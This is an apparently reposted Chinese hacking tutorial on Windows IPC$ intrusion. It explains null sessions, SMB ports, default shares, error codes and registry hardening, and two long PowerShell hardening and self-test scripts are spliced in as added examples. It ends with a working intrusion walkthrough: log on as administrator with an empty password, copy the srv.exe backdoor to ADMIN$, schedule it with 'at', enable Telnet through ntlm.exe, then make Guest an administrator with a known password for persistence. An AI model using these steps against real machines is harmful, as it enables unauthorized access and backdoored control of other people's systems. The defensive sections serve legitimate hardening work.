A detailed look at IPC$ intrusion

zhaozj  2021-02-16

1. Preface

There are plenty of articles online about IPC$ intrusion, and the attack steps have practically become a classic pattern, so nobody bothers to go over this ground again. Still, I personally feel those articles are not detailed enough. For a rookie touching IPC$ for the first time, a bare list of steps does not answer their confusion (just search any hacking forum for "IPC$" and see how many questions there are). So I wrote this tutorial, which is closer to a FAQ: I want to go through the points that are easy to mix up, so that people stop getting stuck in the same places. If you still have questions after reading it, post a reply right away!

2. What is IPC$

IPC$ (Inter-Process Communication share) is the hidden share that exposes the "named pipe" resource (everyone describes it this way). A client connects to it, is authenticated with a username and password, and from then on holds whatever permissions that account has on the host; it is used when remotely managing a computer or viewing its shared resources. With IPC$, a connecting party can even establish a null session (an "empty connection") with the target host without supplying any username or password (of course the target machine must have the IPC$ share enabled, otherwise you cannot connect at all), and over that null session the connecting party can also obtain the list of users on the target host (though a responsible administrator will disable anonymous export of the user list).

We keep talking about the "IPC$ vulnerability", but IPC$ is not really a vulnerability. It is a remote network logon feature opened to make an administrator's remote management easier, and alongside it Windows also opens the default (administrative) shares, that is, every logical drive (C$, D$, E$ ...) and the system directory Winnt or Windows (ADMIN$). All of this was meant to help administrators, but good intentions do not always turn out well: some people with bad intentions (what is "bad"? I do not know either, it is just a pronoun) use IPC$ to access the shared resources, export the user list, and run dictionary tools to probe passwords, hoping to reach higher privileges for purposes that are not exactly wholesome.

Points that are easy to confuse:

1) The IPC$ connection is a remote network logon feature specific to Windows NT and later, roughly the counterpart of Telnet on UNIX. Because IPC$ relies on many DLL functions that exist only in Windows NT, it cannot run on Windows 9x. In other words, only NT/2000/XP can establish an IPC$ connection; 98/ME cannot (some friends say a null session can be set up from 98; I do not know whether that is true, but it is 2003 now and I suggest 98 users change their system, 98 is no good).

2) Even a null session still needs the target to have IPC$ shared; if the other side has removed the IPC$ share, you cannot connect at all.

3) Having a connection does not mean you can view the other side's user list, because the administrator can disallow exporting the user list.

3. The IPC$ connection in a hacking attack

As said above, even a null session can give you a good deal of information (and that information is often essential) and access to some shares. If you can log in as a user with some level of permissions, you get exactly that user's permissions, and obviously if you log in as an administrator, heh heh, nothing more needs saying: what u want, u can do!! (Basically you can collect the target's information, manage its processes and services, upload a trojan and run it, and if it is 2000 Server you can also consider enabling Terminal Services for convenient control. Is that enough?) But do not celebrate too early, because the administrator's password is not that easy to get. There are still a few careless administrators with an empty or trivially weak password, but they are a minority, and things are not what they used to be: people's security awareness has grown and administrators are more careful, so getting the administrator's password will only become harder :( So the most likely outcome is that you connect with minimal permissions or even none, and you will slowly discover that IPC$ is not all-powerful; when the host has not shared IPC$ at all, you cannot even connect. So I think you should not treat IPC$ intrusion as an ultimate weapon and expect to win every time with it. It is more like the passing before a goal on the football pitch: rarely decisive by itself, but indispensable. That, I think, is the meaning of the IPC$ connection in a hacking intrusion.

4. IPC$, null sessions, ports 139/445 and the default shares

The relationships among these puzzle many rookies, but most articles never spell them out. Honestly my own understanding is not exhaustive either; what follows is a summary from discussions with everyone (BBS discussion is a good thing).

1) IPC$ and the null session: an IPC$ connection made without a username and password is a null session (an "empty connection"). Once you connect as a particular user or as an administrator (that is, an IPC$ connection with a specific username and password), it is naturally no longer a null session. Many people ask: since I can already connect with a null session, why should I go on to brute-force weak passwords? As I said before, when you log in over a null session you have essentially no permissions (very frustrating), whereas logging in as a user or administrator gives you that account's permissions (who does not want permissions? So stop being lazy).

2) IPC$ and ports 139/445: the IPC$ connection is what makes remote logon and access to the default shares possible. An open port 139 means the NetBIOS session service (SMB over NetBIOS) is in use, and on Windows 2000 port 445 carries SMB directly over TCP. Access to shared files and printers goes through 139 or 445, so in general an IPC$ connection needs port 139 or 445 to be reachable.

3) IPC$ and the default shares: the default (administrative) shares are opened by default for the administrator's convenience (you can of course disable them): every logical drive (C$, D$, E$ ...) and the system directory Winnt or Windows (ADMIN$). Through an IPC$ connection we can reach these default shares (provided the other side has not removed them).

5. Reasons an IPC$ connection fails

The following five reasons are the most common:
1) Your own system is not NT or later;
2) The other side has not shared IPC$;
3) The other side's port 139 or 445 is not open (for example, filtered by a firewall);
4) Your command is mistyped (a missing space, etc.);
5) Wrong username or password (irrelevant for a null session, of course).

You can also diagnose the cause from the error number returned:
Error 5, access denied: most likely the account you are using does not have administrator rights; get more privileges first.
Error 51, Windows cannot find the network path: a network problem.
Error 53, the network path was not found: wrong IP address; the target's LanmanServer (Server) service is not running; or the target has a firewall doing port filtering.
Error 67, the network name cannot be found: your own LanmanWorkstation (Workstation) service is not running, or the target has deleted the IPC$ share.
Error 1219, the credentials supplied conflict with an existing set of credentials: you already have an IPC$ connection to that host; delete it and reconnect.
Error 1326, unknown user name or bad password: self-explanatory.
Error 1792, an attempt was made to log on, but the network logon service was not started: the target's Netlogon service is not running (this comes up when connecting to a domain).
Error 2242, the password of this user has expired: the target has an account policy that forces periodic password changes.

IPC$ connections are more complicated than this list. Apart from the reasons above there are other indeterminate factors that I cannot cover in detail; that is left to everyone's own experience and experiments.

6. How to open IPC$ on the target (this paragraph is taken from related articles)

First you need a shell on the target that does not depend on IPC$, for example through SQL Server's command-shell extended procedure (xp_cmdshell), Telnet, or a trojan, and that shell must have administrator privileges. Then run net share ipc$ in that shell to create the IPC$ share on the target. As described above, IPC$ is useful for many things, so first confirm that the related services (the Server service on the target, the Workstation service on your side) are running. If they are not, start them (if you do not know how, see the usage of the net command); if you cannot (for example a firewall or anti-virus gets in the way), I suggest giving up.

7. How to prevent IPC$ intrusion

1) Stop null sessions from enumerating (this does not stop the null session itself from being established; taken from "Anatomy of Win2000"). Run regedit, find the key
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa
and set the DWORD value restrictanonymous to 1. (Setting it to 2 causes problems, for example some Windows services stop working.)

2) Disable the default shares
   a) List the local shares: Start, Run, cmd, then type: net share
   b) Delete the shares (one command at a time):
      net share ipc$ /delete
      net share admin$ /delete
      net share c$ /delete
      net share d$ /delete
      (continue with e$, f$, ... if present)
   c) Stop the Server service: net stop server /y
      (after a reboot the Server service starts again and the shares come back)
   d) Edit the registry: Run, regedit.
      Server edition: find the key
      HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters
      and set AutoShareServer (DWORD) to 0.
      Pro (Workstation) edition: under the same key, set AutoShareWks (DWORD) to 0.
      If the value does not exist, create it (right-click, New, DWORD value) and then set it.

3) Permanently close IPC$ and the default shares by disabling the service they depend on: LanmanServer, the Server service. Control Panel, Administrative Tools, Services, find the Server service, right-click, Properties, General, Startup type: Disabled.

4) Install a firewall (check its settings) or filter ports (block 139, 445, etc.), or use a newer version of Windows 优化大师 (Windows Optimization Master).

5) Set a complex password to defeat password probing over IPC$.
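The registry edits, share deletions and service change above can be audited and applied from one elevated PowerShell prompt. The script below is an added example, not part of the original post or of any tool it mentions. It assumes a modern Windows host (PowerShell 5.1 or later, net.exe and the LanmanServer service present); the RestrictAnonymousSAM value it also sets is the XP-and-later switch for anonymous SAM enumeration, which the post does not mention; and the function names and the -DisableServerService / -BlockSmbPorts switches are this example's own.

```powershell
# Added example, not from the original post: audit and apply the IPC$ and
# default-share hardening of section 7. Run from an elevated PowerShell.

$LsaKey    = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
$LanmanKey = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'

function Get-AdminShares {
    # "net share" prints one share per line; the hidden administrative shares
    # are the ones whose name ends in $ (IPC$, ADMIN$, C$, D$, ...).
    net share | ForEach-Object {
        if ($_ -match '^\s*([A-Za-z]+\$)\s') { $Matches[1].ToUpper() }
    }
}

function Get-IpcHardeningState {
    # $null for a registry value means "not set", i.e. the Windows default
    # (anonymous enumeration allowed, administrative shares auto-created).
    $lsa = Get-ItemProperty -Path $LsaKey    -ErrorAction SilentlyContinue
    $srv = Get-ItemProperty -Path $LanmanKey -ErrorAction SilentlyContinue
    [pscustomobject]@{
        RestrictAnonymous    = $lsa.RestrictAnonymous
        RestrictAnonymousSAM = $lsa.RestrictAnonymousSAM
        AutoShareServer      = $srv.AutoShareServer
        AutoShareWks         = $srv.AutoShareWks
        AdminShares          = @(Get-AdminShares)
        ServerStartType      = (Get-Service -Name LanmanServer).StartType
    }
}

function Set-IpcHardening {
    param(
        [switch]$DisableServerService,   # section 7 step 3: stops ALL file/print sharing
        [switch]$BlockSmbPorts           # section 7 step 4: inbound 139/445 firewall rule
    )
    foreach ($key in $LsaKey, $LanmanKey) {
        if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
    }
    # Step 1: stop null sessions from enumerating users and shares. The post
    # warns that 2 breaks some services, so 1 is used here.
    Set-ItemProperty -Path $LsaKey -Name RestrictAnonymous    -Type DWord -Value 1
    Set-ItemProperty -Path $LsaKey -Name RestrictAnonymousSAM -Type DWord -Value 1

    # Step 2d: keep the Server service from recreating C$, D$, ADMIN$ at start.
    Set-ItemProperty -Path $LanmanKey -Name AutoShareServer -Type DWord -Value 0
    Set-ItemProperty -Path $LanmanKey -Name AutoShareWks    -Type DWord -Value 0

    # Step 2b: remove the shares that exist right now; the registry values above
    # only take effect the next time the Server service starts. IPC$ is not
    # governed by AutoShare* and comes back with the service regardless, which
    # is why step 3 (disabling the service) is the only permanent answer.
    foreach ($share in Get-AdminShares) {
        net share $share /delete | Out-Null
    }

    if ($BlockSmbPorts) {
        New-NetFirewallRule -DisplayName 'Block inbound SMB (139,445)' -Direction Inbound `
            -Protocol TCP -LocalPort 139,445 -Action Block | Out-Null
    }
    if ($DisableServerService) {
        Stop-Service -Name LanmanServer -Force
        Set-Service  -Name LanmanServer -StartupType Disabled
    }
    Get-IpcHardeningState
}

# Usage: look first, then apply.
Get-IpcHardeningState | Format-List
# Set-IpcHardening                           # registry + live share removal only
# Set-IpcHardening -DisableServerService     # the "permanent" option of step 3
```

Run Get-IpcHardeningState once before and once after: the before state on a stock install shows the AutoShare values as empty and IPC$, ADMIN$ and C$ present; after Set-IpcHardening the list is empty until the Server service next starts, at which point only IPC$ returns unless the service was disabled.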

8. Related commands

1) Create a null session:
   net use \\IP\ipc$ "" /user:""
   (pay attention to the spaces between the arguments; both pairs of double quotes are left empty)

2) Create a non-null connection:
   net use \\IP\ipc$ "password" /user:"username"
   (the password comes first, and the username follows /user:; the spacing is the same as above)

3) Map a default share:
   net use z: \\IP\c$ "password" /user:"username"
   (this maps the other side's C drive as your own Z drive; the other drives work the same way). If you have already established an IPC$ connection to the target, you can access \\IP\<drive letter>$ directly without repeating the credentials:
   net use z: \\IP\c$

4) Delete an IPC$ connection:
   net use \\IP\ipc$ /del

5) Delete a share mapping:
   net use z: /del   (removes the mapped Z drive; other drive letters work the same way)
   net use * /del    (removes all mappings; you will be prompted to press Y to confirm)
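The commands above can be scripted into a self-check that a defender runs against their own host after applying section 7: attempt the null session, then the share enumeration that RestrictAnonymous is supposed to block, then an authenticated connection, and translate the "System error N" that net.exe prints into the causes listed in section 5. This is an added example, not part of the original post. It assumes an English-language Windows (the error text is parsed), that 192.0.2.10 and the credentials are placeholders you replace, and the function names are this example's own.

```powershell
# Added example, not from the original post: exercise the net use / net view
# commands of section 8 against a host and explain the outcome with the error
# numbers of section 5. Placeholders: 192.0.2.10, 'administrator', 'P@ssw0rd'.

# Section 5's error numbers, as net.exe prints them ("System error N has occurred.").
$IpcErrorCauses = @{
    5    = 'access denied: anonymous or this account lacks rights on the target'
    51   = 'Windows cannot find the network path: network problem'
    53   = 'network path not found: wrong IP, Server service stopped, or 139/445 filtered'
    67   = 'network name not found: local Workstation service stopped, or IPC$ share removed'
    1219 = 'credentials conflict: a session to this host already exists, run net use \\host\ipc$ /del'
    1326 = 'unknown user name or bad password'
    1792 = 'Netlogon service not started on the target (domain logon)'
    2242 = 'the password of this account has expired'
}

function Invoke-Net {
    # Run net.exe with an exact argument string so that the empty "" arguments
    # of the null session survive (PowerShell 5.1 drops empty-string arguments
    # to native commands), and capture stdout+stderr plus the exit code.
    param([string]$Arguments)
    $psi = New-Object System.Diagnostics.ProcessStartInfo
    $psi.FileName               = "$env:SystemRoot\System32\net.exe"
    $psi.Arguments              = $Arguments
    $psi.UseShellExecute        = $false
    $psi.RedirectStandardOutput = $true
    $psi.RedirectStandardError  = $true
    $p = [System.Diagnostics.Process]::Start($psi)
    $text = $p.StandardOutput.ReadToEnd() + $p.StandardError.ReadToEnd()
    $p.WaitForExit()
    [pscustomobject]@{ ExitCode = $p.ExitCode; Output = $text.Trim() }
}

function Get-NetErrorCode {
    param([string]$Output)
    if ($Output -match 'System error (\d+)') { return [int]$Matches[1] }
    return $null
}

function Test-IpcConnection {
    param(
        [Parameter(Mandatory)] [string]$Target,
        [string]$User     = '',   # both empty = the null session of section 8, item 1
        [string]$Password = ''
    )
    $share = "\\$Target\ipc`$"
    # Same form as section 8: net use \\IP\ipc$ "password" /user:"username"
    $use       = Invoke-Net "use $share `"$Password`" /user:`"$User`""
    $code      = Get-NetErrorCode $use.Output
    $connected = ($use.ExitCode -eq 0)

    # A null session that connects is not the problem by itself; whether it can
    # list shares (section 7 step 1, RestrictAnonymous) is. net view rides the session.
    $enumerated = $null
    if ($connected) {
        $view       = Invoke-Net "view \\$Target"
        $enumerated = ($view.ExitCode -eq 0)
        Invoke-Net "use $share /delete" | Out-Null   # section 8, item 4: clean up
    }

    if ($connected) { $cause = 'connection accepted' }
    elseif ($null -ne $code -and $IpcErrorCauses.ContainsKey($code)) { $cause = $IpcErrorCauses[$code] }
    else { $cause = 'error not in the section 5 list; see Raw' }

    $account = '<null session>'
    if ($User) { $account = $User }

    [pscustomobject]@{
        Target     = $Target
        Account    = $account
        Connected  = $connected
        Enumerated = $enumerated
        ErrorCode  = $code
        Cause      = $cause
        Raw        = $use.Output
    }
}

# Usage (replace the placeholders). After section 7 step 1 the null session may
# still connect but Enumerated should be False; after step 3 it should not connect.
Test-IpcConnection -Target '192.0.2.10' | Format-List
Test-IpcConnection -Target '192.0.2.10' -User 'administrator' -Password 'P@ssw0rd' | Format-List
```

Read the two results together: Connected=True with Enumerated=True for the null session means the host is still in the state section 2 describes; Connected=True with Enumerated=False means step 1 of section 7 is in effect; ErrorCode 5 or 53 on the null session means the IPC$ share is gone or 139/445 is filtered.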

The following intrusion procedure is a classic; most IPC$ tutorials include it, so I reproduce it here with thanks to the original author (whichever senior you are).

1. C:\>net use \\127.0.0.1\ipc$ "" /user:"administrator"
   This connects to a host found with the 流光 (Fluxay) scanner whose administrator password is empty (an empty password? wow, lucky). Here 127.0.0.1 stands for the target's IP address. Because the password is empty, the first pair of quotes is left empty; the second pair, after /user:, holds the username administrator, and the command is complete.

2. C:\>copy srv.exe \\127.0.0.1\admin$
   Copy srv.exe (found in Fluxay's Tools directory) to the target. admin$ is the target's c:\winnt\system32; you could also use c$ or d$ for the C and D drives, depending on where you want to put it.

3. C:\>net time \\127.0.0.1
   Check the target's clock. Say it reports that the current time on 127.0.0.1 is 2002/3/19 11:00 AM and the command completed successfully.

4. C:\>at \\127.0.0.1 11:05 srv.exe
   Schedule srv.exe with the at command (set the time a little later than the target's clock, otherwise how would it ever start, heh).

5. C:\>net time \\127.0.0.1
   Check the time again. Once the current time on 127.0.0.1 reads 2002/3/19 11:05 AM, get ready for the next command.

6. C:\>telnet 127.0.0.1 99
   Note the port: Telnet defaults to 23, but srv.exe has opened port 99 for us on the other side. Although we can now telnet in, srv is one-shot and has to be re-activated every time, so we want a proper Telnet service. That is what ntlm.exe is for.

7. C:\>copy ntlm.exe \\127.0.0.1\admin$
   Upload ntlm.exe to the host with copy (ntlm.exe is also in Fluxay's Tools directory).

8. C:\WINNT\system32>ntlm
   Run ntlm (the C:\WINNT\system32> prompt here is the other side's shell, so ntlm actually runs on the other computer). When "DONE" appears it has worked. Then start the Telnet service with: net start telnet

9. telnet 127.0.0.1
   Enter the username and password and you are on the other machine; operating it is just as easy as working in DOS! (And then what do you want to do? Whatever you want, haha.)

Just in case, we activate Guest and put it into the Administrators group:

10. C:\>net user guest /active:yes
    Activate the other side's guest account.

11. C:\>net user guest 1234
    Change the Guest password to 1234, or to whatever you want.

12. C:\>net localgroup administrators guest /add
    Add guest to the Administrators group ^_^ (if the admin password is changed but the guest account is left alone, next time we can use Guest to get into this computer again).

Please cite the original URL when reposting: https://www.9cbs.com/read-13501.html
